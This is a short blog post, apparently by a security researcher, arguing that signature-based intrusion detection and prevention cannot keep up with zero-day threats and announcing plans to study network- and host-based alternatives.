Signiture Based IDPS is a weak defensive model
Don't get me wrong, signature based anti-virus / mal-ware has saved my ass numerous times, from countless well known and dangerous threats. But in today's modern environment that is not enough. As a computer security researcher, I chase vulnerabilities and monitor threats regularly, and lately I have noticed a growing number of 0-day threats (laymensTerms: new scary unknown viruses!) in the wild. Occasionally, we know the specific vulnerabilities they capitalize on, but still become manipulated when our signatures don't match these newly created attack scripts. This logical process of discovering a threat, and listing it for detection, inherently makes it a weak defensive technique. Therefore, I will devote some coming time to investigating other IDPSystems, in an attempt to finding a better defensive solution. I will examine Network Intrusion Detection and Prevention Systems, and Host-based Intrusion Detection and Prevention Systems. The end result will be a 'best practice' solution, and a personal theoretical solution. Time to get to work...